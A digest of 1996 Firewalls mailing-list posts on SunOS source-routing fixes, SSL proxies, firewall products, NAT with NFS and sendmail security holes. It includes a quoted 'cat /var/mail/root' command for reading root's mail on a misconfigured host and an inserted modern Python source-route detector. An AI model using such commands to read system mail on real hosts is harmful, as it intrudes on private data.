From firewalls-owner Fri Jan 5 08:07:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA06866 for firewalls-outgoing; Fri, 5 Jan 1996 07:51:36 -0800 (PST) Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA06847 for ; Fri, 5 Jan 1996 07:51:29 -0800 (PST) Received: from calloway.bwh.harvard.edu (calloway.bwh.harvard.edu [134.174.81.46]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id KAA27683; Fri, 5 Jan 1996 10:50:51 -0500 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by calloway.bwh.harvard.edu (8.6.9) id KAA08493; Fri, 5 Jan 1996 10:49:26 -0500 Message-Id: <199601051549.KAA08493@calloway.bwh.harvard.edu> Subject: Re: Source Routed Packets To: CARSON@rmcs.cranfield.ac.uk (Neil) Date: Fri, 5 Jan 1996 10:49:25 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <960105133833.212c@rmcs.cranfield.ac.uk> from "Neil" at Jan 5, 96 01:38:33 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

You wrote:
| I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel
| with IP packet forwarding turned off.
|
| The only problem is that SunOS will still (I believe) allow IP source
| routed packets through the bastion host.
|
| Is there a software fix for this available that does not mean buying a
| screening Cisco or something like that?

It's a simple kernel modification. In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your kernel):

options "IPFORWARDING=-1"

There is a README in that directory that explains how to rebuild the kernel, if you're not used to doing it, or need a reminder.
In a generic SUNOS kernel, I'd suggest turning off (or considering why you need):

QUOTA: No users, no changes, no need to do quotas.
NFSCLIENT, NFSSERVER: No File Security? Get rid of it.
PCFS: Do you need that floppy for anything other than Tripwire?
IPC (message, semaphore, shmem): Shared memory? Too complex.
TCPdebug: Do you use trpt? Does anything you plan to run on the firewall use it?
RFS, VFSstats: Again, no sharing of disks.
VDDRV (Loadable modules): Unless you have a device that demands them, loadmodule strikes me as more access to the kernel than you want.
WINSVJ: Sunview? You're going to run it?

The snit, pf, and nbuf pseudo-devices should probably go; your firewall is not a sniffer, or a network test device. I'd get rid of audio, too, unless you're using it for a PRNG seed.

Adam
--
"It is seldom that liberty of any kind is lost all at once." -Hume

From firewalls-owner Fri Jan 5 10:38:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA09941 for firewalls-outgoing; Fri, 5 Jan 1996 10:23:42 -0800 (PST) Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA09936 for ; Fri, 5 Jan 1996 10:23:38 -0800 (PST) Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA19436; Fri, 5 Jan 1996 12:07:37 -0600 Date: Fri, 5 Jan 1996 12:07:37 -0600 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9601051807.AA19436@hosaka.smallworks.com> To: CARSON@rmcs.cranfield.ac.uk, adam@bwh.harvard.edu Subject: Re: Source Routed Packets Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>You wrote:
>
>It's a simple kernel modification.
>
>In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your
>kernel.)
>
>options "IPFORWARDING=-1"

This won't prevent source routing.
Jim

From firewalls-owner Fri Jan 5 11:07:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10281 for firewalls-outgoing; Fri, 5 Jan 1996 10:41:04 -0800 (PST) Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10276 for ; Fri, 5 Jan 1996 10:40:33 -0800 (PST) Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id NAA00513; Fri, 5 Jan 1996 13:41:08 -0500 Date: Fri, 5 Jan 1996 13:41:08 -0500 Message-Id: <199601051841.NAA00513@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: mckenney@smiley.mitre.org (Brian W. McKenney) From: wbunting@ch.inri.com (Bill Bunting) Subject: Re: SSL and S-HTTP Proxy support Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>I would like to have an update as to which commercial firewall vendors
>support or plan to support (when) an SSL and/or S-HTTP proxy. I will post
>a summary.
>
>This is the information that I have:
>
>1. TIS Gauntlet: SSL and S-HTTP proxies in next release.
>2. KarlBridge/KarlBrouter: S-HTTP proxy
>3. Milkyway Blackhole: S-HTTP
>4. SOS Brimstone: S-HTTP proxy
>5. Technologic Interceptor: S-HTTP proxy
>6. V-One SmartWall: S-HTTP proxy
>
>License versions of TIS Gauntlet will support whatever the next Gauntlet
>release supports.
>
> -Brian
>
>Respectfully,
>
>Brian W. McKenney (mckenney@mitre.org)
>Network Security Engineering
>The MITRE Corporation Mail Stop: Z-231
>7525 Colshire Drive McLean, VA 22102
>Voice: 703-883-5463 Fax: 703-883-1245

SSL is not the type of protocol that requires a proxy. SSL is a Secure Sockets Layer API that can be used with any TCP port. For example, you can use SSL to secure a FTP, Telnet, WWW, or any other TCP protocol.
Did TIS really tell you that they have a SSL proxy?? If so, what does it do? Am I missing something? Best regards, -Bill. --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Fri Jan 5 11:22:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10654 for firewalls-outgoing; Fri, 5 Jan 1996 10:55:26 -0800 (PST) Received: from tintagel.kesmai.com (tintagel-out.kesmai.com [199.95.72.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA10639 for ; Fri, 5 Jan 1996 10:55:19 -0800 (PST) Received: by tintagel.kesmai.com; id NAA12279; Fri, 5 Jan 1996 13:52:23 -0500 Received: from muddy.kesmai.com(199.95.75.19) by tintagel.kesmai.com via smap (g3.0.1) id sma012276; Fri, 5 Jan 96 13:52:19 -0500 Received: from sandy_bryant (kespc222.kesmai.com [199.95.75.222]) by muddy.kesmai.com (8.6.12/8.6.9) with SMTP id NAA01907; Fri, 5 Jan 1996 13:53:17 -0500 Date: Fri, 5 Jan 1996 13:53:17 -0500 Message-Id: <199601051853.NAA01907@muddy.kesmai.com> X-Sender: slb@muddy.kesmai.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: SorG Farkas , firewalls@GreatCircle.COM From: sandy bryant Subject: Re: Gauntlet from TIS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 07:27 PM 1/4/96 -0800, SorG Farkas wrote: >If any of you has experience with Gauntlet, I would appreciate any info >about it (if it does what it promises, if it's reliable, any problems you >encountered, any do's and don'ts, experience with the support from them, >etc.). 
We are considering it for my company. Thanks a lot. > > We've run one here for about a year. I regard it as sort of one step up the price vs. effort ladder from installing the TIS toolkit yourself - although actually now TIS has ceased upgrading the free toolkit and the last upgrade of GAUNTLET was a significant upgrade which added truly transparent proxies. I have been happy with it - the proxies are reasonably easy to set up and flexible enough to keep the staff happy behind the firewall. TIS is still small enough that when I call with a problem, I get to talk to someone technical who probably even helped with the development. For the price, I think it's a good choice. sandy bryant kesmai corp. sandy@kesmai.com From firewalls-owner Fri Jan 5 11:40:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11294 for firewalls-outgoing; Fri, 5 Jan 1996 11:21:48 -0800 (PST) Received: from ns2.cpicorp.com (ns2.cpicorp.com [204.233.170.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11289 for ; Fri, 5 Jan 1996 11:21:44 -0800 (PST) Received: (from bkoen@localhost) by ns2.cpicorp.com (8.6.12/8.6.9) id TAA14429; Fri, 5 Jan 1996 19:54:16 -0600 Date: Fri, 5 Jan 1996 19:54:15 -0600 (CST) From: Bryan Koen To: firewalls@greatcircle.com Subject: BorderWare Product Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are looking possibly at using the Borderware product here at CPI Corp. I would like to know if anybody is currently using this package and what experiences (good/bad) they have had with it. Thanks, Bryan Koen SysAdmin CPI Corp. ========================================================================== These opinions are my own and do not reflect in any way on CPI Corporation. 
From firewalls-owner Fri Jan 5 11:52:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11460 for firewalls-outgoing; Fri, 5 Jan 1996 11:25:07 -0800 (PST) Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11455 for ; Fri, 5 Jan 1996 11:25:03 -0800 (PST) Received: from calloway.bwh.harvard.edu (calloway.bwh.harvard.edu [134.174.81.46]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id OAA00459; Fri, 5 Jan 1996 14:24:27 -0500 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by calloway.bwh.harvard.edu (8.6.9) id OAA09213; Fri, 5 Jan 1996 14:23:02 -0500 Message-Id: <199601051923.OAA09213@calloway.bwh.harvard.edu> Subject: Re: Source Routed Packets To: jim@SmallWorks.COM (Jim Thompson) Date: Fri, 5 Jan 1996 14:23:02 -0500 (EST) Cc: CARSON@rmcs.cranfield.ac.uk, adam@bwh.harvard.edu, firewalls@GreatCircle.COM In-Reply-To: <9601051807.AA19436@hosaka.smallworks.com> from "Jim Thompson" at Jan 5, 96 12:07:37 pm X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jim wrote, responding to me: | >You wrote: | > | >It a simple kernel modification. | > | >In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your | >kernel.) | > | >options "IPFORWARDING=-1" | | This won't prevent source routing. D'oh! I should learn not to post before coffee. :) -- "It is seldom that liberty of any kind is lost all at once." 
-Hume

From firewalls-owner Fri Jan 5 12:10:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA11221 for firewalls-outgoing; Fri, 5 Jan 1996 11:17:37 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA11216 for ; Fri, 5 Jan 1996 11:17:33 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id LAA14767; Fri, 5 Jan 1996 11:15:07 -0800 Received: from unknown(134.127.16.1) by mycroft via smap (V1.3mjr) id sma014754; Fri Jan 5 11:14:33 1996 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id MAA25950; Fri, 5 Jan 1996 12:14:55 -0700 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id OAA11953; Fri, 5 Jan 1996 14:14:48 -0500 Date: Fri, 5 Jan 1996 14:14:47 -0500 (EST) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: Frank Willoughby cc: Neil , firewalls@GreatCircle.COM Subject: Re: Source Routed Packets In-Reply-To: <9601051437.AA07804@su1.in.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Well, all he has to be specific about is the version of Sun OS that he is running. If it is SunOS 4.1.X you need to patch the kernel to turn off source routing (this patch is, to the best of my knowledge, not supported by SUN); it can be found in the archives of this mailing list. If it is Solaris 2.X I have been told you can turn off IP source routing using ndd. I have not verified the part about Solaris.

Mike

Mike Malik (mam@ssds.com)
9841 Broken Land Parkway,Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 On Fri, 5 Jan 1996, Frank Willoughby wrote: > Date: Fri, 5 Jan 96 09:37:15 -0500 > From: Frank Willoughby > To: Neil > Cc: firewalls@GreatCircle.COM > Subject: Re: Source Routed Packets > > Neil, > > > >I am currently using, in a trial firewall, a Sun SPARC 10 running a kernel > >with IP packet forwarding turned off. > > > >The only problem is that SunOS will still (I believe) allow IP source > >routed packets through the bastion host. > > > > It is difficult to tell which firewall you are evaluating. Can you be > more specific? > > > >Is there a software fix for this available that does not mean buying a > >screening Cisco or something like that? > > > > Yours Aye, > > > > Neil > > > >* Neil A Carson > >* The Royal Military College of Science, Shrivenham > >* e-mail carson@rmcs.cranfield.ac.uk > >* Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA. Tel: (01793) 784428 (Home) > > Best Regards, > > > Frank > Fortified Networks Inc. - Management & Information Security Consulting > Phone: (317) 573-0800 - http://www.fortified.com/fortified/ > > > The opinions expressed above are of the author and may not > necessarily be representative of Fortified Networks Inc. 
> > From firewalls-owner Fri Jan 5 12:20:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA10675 for firewalls-outgoing; Fri, 5 Jan 1996 10:56:06 -0800 (PST) Received: from SanFrancisco01.POP.InterNex.Net (SanFrancisco01.POP.InterNex.Net [205.158.3.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA10670 for ; Fri, 5 Jan 1996 10:56:00 -0800 (PST) Received: from Anthros.Com ([205.158.235.130]) by SanFrancisco01.POP.InterNex.Net (post.office MTA v1.9.1 ID# 0-11028) with SMTP id AAA10541 for ; Fri, 5 Jan 1996 10:54:41 -0700 Received: from phoebe.Anthros.Com by Anthros.Com (5.0/SMI-SVR4) id AA03549; Fri, 5 Jan 1996 10:53:57 -0800 Received: by phoebe.Anthros.Com (5.x/SMI-SVR4) id AA17178; Fri, 5 Jan 1996 10:51:11 -0800 Date: Fri, 5 Jan 1996 10:51:11 -0800 From: daemeonr@Anthros.Com@Anthros.Com Message-Id: <9601051851.AA17178@phoebe.Anthros.Com> To: firewalls@greatcircle.com Subject: Re: Holes in SunOS sendmail -Reading Root Mail X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The System administrator is incompetent (or more likely a sequence of underpaid wanna-be system administrators whose aggregate value equals one incompetent system admin). It is physically impossible to configure Sendmail to do what you saw, but easy for any root user (and they must be root or had the system hacked by someone who became root - i.e. the Sun security patches were not applied). Note that we have a thread here that assumes Suns are screwed up. The disadvantages of Suns are that (a) any fool can buy both a machine and a bootleg copy of the OS (b) both are cheap and (c) because of (b) they are common in colleges and university colleges. As a result, there are a bunch of wanna-be (i.e. cheap) admins out there who are screwing up Sun's - and Sun gets the bad rap! The OS security holes exist on every system from SCO, IBM or HP. 
The difference is that IBM, HP, and SGI customers are less likely to be of the low-life variety, hence more likely to run a professional organization with skilled admins. Note that the vast majority of Sun shops are likewise professionally run, but why do you think your low-price-leader Internet provider is using Suns?

=> From firewalls-owner@GreatCircle.COM Sat Dec 23 18:58 PST 1995
=> Date: Sat, 23 Dec 1995 22:22:55 +0400
=> X-Sender: gscpraba@emirates.net.ae
=> Mime-Version: 1.0
=> To: Doug Hughes
=> From: gscpraba@ns2.emirates.net.ae (G.S.C.Prabhakar (The Sun))
=> Subject: Re: Holes in SunOS sendmail -Reading Root Mail
=> Cc: firewalls@greatcircle.com
=> Sender: firewalls-owner@GreatCircle.COM
=> Content-Type: text/plain; charset="us-ascii"
=>
=> >>Hello again all,
=> >>
=> >> SunOS sendmail. Apparently there are some holes in it that allow a
=> >>potential cracker to gain root privilege on the host system, and install
=> >>password sniffers etc.
=>
=> >There are so many of such wide variety that it becomes tough to keep
=> >track of them all.
=> >
=> >among them:
=> >syslog buffer overflow gives root access
=> >executing local mailer in a certain way gives root access
=> >probably a race condition or two.
=>
=> In one of the Internet Mail services I log in, the ordinary user can just
=> read all the mail sent to the root. Is the Root Mail box normally kept
=> like that on other systems, or was it a configuration negligence by the
=> systems people?
=>
=> The command to read that mail to root, when given by a normal user, is
=>
=> cat /var/mail/root
=>
=> Then you can read all the mail sent to the root.
=>
=> Can somebody clarify?
=>
=> GSC Prabhakar.
=>
=> ****************************************************************************
=> " Wishing You a very Merry Christmas and Prosperous New Year 1996"
=>
=> G.S.C.Prabhakar (gscpraba@emirates.net.ae)
=> Internet Consultant & Trainer-
=> P.O.Box 72432
=> Abu Dhabi.
=> United Arab Emirates. => => Pager : 91-555-304 => **************************************************************************** => ******* => From firewalls-owner Fri Jan 5 12:22:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA12988 for firewalls-outgoing; Fri, 5 Jan 1996 12:08:39 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA12958 for ; Fri, 5 Jan 1996 12:08:33 -0800 (PST) Message-Id: <199601052008.MAA12958@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA076902503; Sat, 6 Jan 1996 07:08:23 +1100 From: Darren Reed Subject: NAT & NFS ? To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Sat, 6 Jan 1996 07:08:23 +1100 (EDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client and server, actively rewriting the addresses in all the packets involved ? If so, have any problems or unexpected situations arisen ? 
thanks, darren

From firewalls-owner Fri Jan 5 13:48:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA13131 for firewalls-outgoing; Fri, 5 Jan 1996 12:13:12 -0800 (PST) Received: from bluenote.ccrwest.org (bluenote.ccrwest.org [192.203.205.129]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA13126 for ; Fri, 5 Jan 1996 12:13:03 -0800 (PST) Received: by bluenote.ccrwest.org (4.1/CCRWEST-I1.19) id AA15274; Fri, 5 Jan 96 12:10:44 PST Received: from ccrwest.ccrwest.org(192.203.205.65) by bluenote.ccrwest.org via smap (V1.3) id sma015272; Fri, 5 Jan 1996 12:10:17 -0800 Received: from poco.ccrwest.org by ccrwest.ccrwest.org (4.1/CCRWEST-2.9) id AA03139; Fri, 5 Jan 96 12:10:17 PST Received: by poco.ccrwest.org (4.1/ccrwest-1.6) id AA19043; Fri, 5 Jan 96 12:10:15 PST Date: Fri, 5 Jan 96 12:10:15 PST From: Rich Schultz Message-Id: <9601052010.AA19043@poco.ccrwest.org> To: CARSON@rmcs.cranfield.ac.uk, adam@bwh.harvard.edu, jim@SmallWorks.COM Subject: Re: Source Routed Packets Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> >It is a simple kernel modification.
> >
> >In /usr/sys/`arch/conf/FIREWALL (or whatever you have named your
> >kernel.)
> >
> >options "IPFORWARDING=-1"
>
> This won't prevent source routing.

Yes and no. If you set this option, the SunOS 4.1.3 kernel will NOT source route from one interface to another, but it will let you source route in and out the same interface. I have confirmed this by reading the code and by throwing source-routed packets at a host configured this way.

This means, if you have one interface connected to the Internet and another connected to your private net, no one can source-route from one net to the other, but they can bounce packets off of your host to make mischief elsewhere.
Rich Schultz rich@ccrwest.org From firewalls-owner Fri Jan 5 13:59:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA13050 for firewalls-outgoing; Fri, 5 Jan 1996 12:11:02 -0800 (PST) Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA13045 for ; Fri, 5 Jan 1996 12:10:58 -0800 (PST) Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id PAA00165; Fri, 5 Jan 1996 15:10:21 -0500 Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA01779; Fri, 5 Jan 96 15:10:14 EST Date: Fri, 5 Jan 96 15:10:14 EST Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: wbunting@ch.inri.com (Bill Bunting) From: mckenney@smiley.mitre.org (Brian W. McKenney) Subject: Re: SSL and S-HTTP Proxy support Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >SSL is not the type of protocol that requries a proxy. SSL is a Secure >Sockets Layer API that can be used with any TCP port. For example, you can >use SSL to secure a FTP, Telnet, WWW, or any other TCP protocol. Did TIS >really tell you that they have a SSL proxy?? If so, what does it do? Dual-homed gateway-based firewalls with IP forwarding disabled need to relay connections between an SSL-enhanced Web browser and server. Hence, an SSL proxy is needed to relay these connections. Capabilities among SSL proxies may differ. In most cases, SSL proxies may behave just like HTTP proxies in that they (a) can accept/reject connections based on IP addresses and (b) support the logging of connections. Additional functionality may be added to an SSL proxy (e.g., validation of signatures), but this may result in the addition of server code modules on the firewall. This practice conflicts with firewall goals to keep proxies simple and small. 
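Returning to Rich Schultz's point on source routing above: a bastion host that wants to close the same-interface "bounce" case has to reject any datagram carrying a source-route option, whatever interface it arrived on. The following is an added example, not code from the list or from SunOS: it parses the IPv4 option area for LSRR/SSRR and applies a drop-anything-source-routed policy; the packets it checks are constructed in the block.

```python
"""Detect IPv4 source-route options (LSRR/SSRR) and drop the packets that carry them."""
import struct

IPOPT_EOL = 0      # end of option list
IPOPT_NOP = 1      # single-byte padding
IPOPT_LSRR = 131   # loose source and record route
IPOPT_SSRR = 137   # strict source and record route


def parse_options(packet: bytes) -> list:
    """Return (type, data) for every option in the IPv4 header.

    Raises ValueError on a malformed header so the caller drops the packet
    instead of guessing about it.
    """
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    version_ihl = packet[0]
    if version_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (version_ihl & 0x0F) * 4
    if ihl < 20 or ihl > len(packet):
        raise ValueError("bad IHL")
    opts = packet[20:ihl]
    out, i = [], 0
    while i < len(opts):
        t = opts[i]
        if t == IPOPT_EOL:
            break
        if t == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option missing length byte")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        out.append((t, opts[i + 2:i + length]))
        i += length
    return out


def source_route(packet: bytes):
    """Return ("lsrr"|"ssrr", [hop addresses]) if the packet is source routed, else None."""
    for t, data in parse_options(packet):
        if t in (IPOPT_LSRR, IPOPT_SSRR):
            # data[0] is the route pointer; the rest is a list of 4-byte hops
            hops = [".".join(str(b) for b in data[k:k + 4])
                    for k in range(1, len(data) - 3, 4)]
            return ("lsrr" if t == IPOPT_LSRR else "ssrr", hops)
    return None


def should_drop(packet: bytes) -> bool:
    """Bastion policy: drop anything source routed or malformed, on every interface."""
    try:
        return source_route(packet) is not None
    except ValueError:
        return True


def build_packet(src: str, dst: str, hops=(), strict=False) -> bytes:
    """Constructed test data: a minimal IPv4 header (no payload), optionally with a
    source-route option listing `hops`. Checksum is left at zero."""
    option = b""
    if hops:
        body = b"".join(bytes(int(x) for x in h.split(".")) for h in hops)
        t = IPOPT_SSRR if strict else IPOPT_LSRR
        option = bytes([t, 3 + len(body), 4]) + body    # type, length, pointer
        option += b"\x00" * (-len(option) % 4)           # pad to 32-bit boundary with EOL
    ihl = 5 + len(option) // 4
    header = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, 20 + len(option),
                         0, 0, 64, 6, 0,
                         bytes(int(x) for x in src.split(".")),
                         bytes(int(x) for x in dst.split(".")))
    return header + option


if __name__ == "__main__":
    # Addresses are constructed documentation-range values.
    bounced = build_packet("10.0.0.5", "192.0.2.1", hops=["192.0.2.1", "198.51.100.9"])
    plain = build_packet("10.0.0.5", "192.0.2.1")
    print("source routed:", source_route(bounced), "drop:", should_drop(bounced))
    print("plain packet drop:", should_drop(plain))
```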
Note that firewall vendors will provide support for an SSL proxy. Netscape provides an SSL proxy today. From firewalls-owner Fri Jan 5 15:44:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06730 for firewalls-outgoing; Fri, 5 Jan 1996 15:37:43 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06725 for ; Fri, 5 Jan 1996 15:37:38 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA04458; Fri, 5 Jan 96 18:36:33 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA05401; Fri, 5 Jan 96 23:37:01 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9601052337.AA05401@london.csd.harris.com> Subject: Re: NAT & NFS ? To: firewalls-owner@GreatCircle.COM (Darren Reed) Date: Fri, 5 Jan 96 23:36:30 GMT In-Reply-To: <199601052008.MAA12958@miles.greatcircle.com>; from "Darren Reed" at Jan 6, 96 7:08 am X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This works fine on the Harris CyberGuard. TCP, UDP, RPC, ICMP all get suitably rewritten - even the ICMP error codes. The 'inside' system can initiate talk to the 'external' system, but the 'external' system has no knowledge of the 'internal' IP address - just the firewall. > > > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client > and server, actively rewriting the addresses in all the packets involved ? > If so, have any problems or unexpected situations arisen ? 
> > thanks, > darren > Regards Jon From firewalls-owner Fri Jan 5 16:29:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07639 for firewalls-outgoing; Fri, 5 Jan 1996 16:14:08 -0800 (PST) Received: from eagle.wd.cubic.com ([149.63.94.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA07634 for ; Fri, 5 Jan 1996 16:14:04 -0800 (PST) Received: (mischler@localhost) by eagle.wd.cubic.com (8.6.9/8.3) id RAA19347; Fri, 5 Jan 1996 17:09:51 -0800 Date: Fri, 5 Jan 1996 17:09:51 -0800 From: Dave Mischler Message-Id: <199601060109.RAA19347@eagle.wd.cubic.com> To: avalon@coombs.anu.edu.au, Firewalls@GreatCircle.COM Subject: Re: NAT & NFS ? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Is anyone using NFS (or RPC) over a WAN/LAN with a NAT in between the client > and server, actively rewriting the addresses in all the packets involved ? > If so, have any problems or unexpected situations arisen ? I have used IPRoute's NAT to translate NFS client addresses from RFC 1597 addresses to global addresses. The only problems I had were related to the speed of the links (too slow). 
You can get IPRoute for evaluation from ftp://ftp.coast.net/SimTel/msdos/network/iprv080.zip From firewalls-owner Fri Jan 5 16:44:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA08197 for firewalls-outgoing; Fri, 5 Jan 1996 16:39:12 -0800 (PST) Received: from NYXGATE1.btco.com (gate1.btco.com [198.83.51.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA08188 for ; Fri, 5 Jan 1996 16:39:07 -0800 (PST) Received: (from mailer@localhost) by NYXGATE1.btco.com (8.7.1/8.6.9) id TAA22834 for ; Fri, 5 Jan 1996 19:38:13 -0500 (EST) X-Authentication-Warning: NYXGATE1.btco.com: mailer set sender to using -f Received: from lncsex0003.eu.btco.com(160.82.152.218) by NYXGATE1.btco.com via smap (V1.3) id sma026999; Fri Jan 5 19:37:58 1996 Received: (from news@localhost) by LNCSEX0003.eu.btco.com (8.7.1/BTmail) id AAA30371; Sat, 6 Jan 1996 00:37:59 GMT To: firewalls@greatcircle.com Path: newsadm From: Todd Aven Newsgroups: btco.list.firewalls Subject: Patches to BIND 4.9.3 available to support delegation in split-DNS configurations Date: Sat, 06 Jan 1996 00:32:11 +0000 Organization: Bankers Trust Company Lines: 48 Message-ID: <30EDC30B.4504@BankersTrust.Com> NNTP-Posting-Host: lnrasw0001.eu.btco.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 2.0b3 (WinNT; I) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have written small patches to BIND 4.9.3-REL which may prove useful to this audience. The problem that is solved arises when you configure a DNS server with a 'forwarders' directive to pass queries to the firewall but do not (or can not) make the server authoritative for all internal zones. This happens because the standard BIND code ignores zone delegation records when the server is configured with a list of forwarders. 
